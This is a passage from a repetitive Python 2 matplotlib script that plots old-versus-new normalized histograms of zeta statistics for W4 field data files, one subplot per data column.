(bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 4\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=9\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(456)\nrangemax=7\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(456)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 5\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=11\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(457)\nrangemax=6\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(457)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 6\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=13\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(458)\nrangemax=6\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(458)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 7\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=15\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(459)\nrangemax=7\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(459)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 8\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=17\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(4,5,11)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(4,5,11)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{z}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 9\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=19\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(4,5,12)\nrangemax=7\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(4,5,12)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 10\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=21\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(4,5,13)\nrangemax=6\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(4,5,13)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 11\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 